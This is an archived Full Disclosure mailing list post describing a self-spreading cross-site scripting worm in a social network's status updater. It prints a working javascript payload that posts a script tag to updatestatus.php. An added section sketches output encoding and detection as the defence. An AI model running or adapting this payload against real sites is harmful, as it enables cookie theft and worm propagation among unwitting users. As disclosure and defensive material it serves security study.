Full Disclosure mailing list archives
F4c3b00k Worm
From: "Kristian Erik Hermansen" <kristian.hermansen () gmail com>
Date: Thu, 25 Dec 2008 06:09:17 -0800
Seems to be able to spread via automated status messages. When another user sees the hijacked status message, they are likely to execute the status updater payload as well, which then spreads to anyone else who can see those status updates. This document.cookie payload is benign. Emulation is achieved by pasting the payload below into Firefox while on the profile.php page...

javascript:var p='profile_id='+document.getElementById('profile_id').value+'&status=<script>alert(document.cookie);</script>'+'&profile=true'+'&test_name=INLINE_STATUS_EDITOR'+'&action=OTHER_UPDATE'+'&post_form_id='+document.getElementById('post_form_id').value;hr=new XMLHttpRequest();hr.overrideMimeType('text/html');hr.open('POST', 'updatestatus.php', true);hr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');hr.setRequestHeader('Content-length', p.length);hr.setRequestHeader('Connection', 'close');hr.send(p);

--
Kristian Erik Hermansen
Have you tried Session Destroyer yet?
<http://kristian.hermansen.googlepages.com/session.destroyer.html>
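Added example, not part of the original post and not the site's own code: a server-side sketch of the defence for the `status` field in the request above, which HTML-encodes the value on output so posted markup renders as text, and raises a logging signal when a submission contains tags. The function names and the placeholder ids in the sample body are assumptions made for illustration.

```javascript
// Constructed sample: the form body from the post, with placeholder ids.
const SAMPLE_BODY =
  'profile_id=1000&status=<script>alert(document.cookie);</script>' +
  '&profile=true&test_name=INLINE_STATUS_EDITOR&action=OTHER_UPDATE' +
  '&post_form_id=PLACEHOLDER';

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode for an HTML text or quoted-attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Parse the urlencoded body the status editor sends (hypothetical helper).
function parseStatusUpdate(body) {
  const params = new URLSearchParams(body);
  return {
    profileId: params.get('profile_id'),
    status: params.get('status') || '',
  };
}

// Detection signal only: flags anything shaped like an HTML tag.
// It is not the fix; a filter like this is for logging and review.
function looksLikeMarkup(status) {
  return /<\s*\/?[a-z][^>]*>/i.test(status);
}

// The fix: store the status as submitted, encode it every time it is rendered.
function renderStatus(update) {
  return '<span class="status">' + escapeHtml(update.status) + '</span>';
}

// Note: the post_form_id token does not stop this class of bug, because the
// script runs in the viewer's own page and reads the token from the DOM.
function handleStatusPost(body) {
  const update = parseStatusUpdate(body);
  return {
    profileId: update.profileId,
    html: renderStatus(update),
    flagged: looksLikeMarkup(update.status),
  };
}

console.log(handleStatusPost(SAMPLE_BODY));
```

Encoding on output keeps harmless text such as `<3` intact, which stripping or rejecting on input would not.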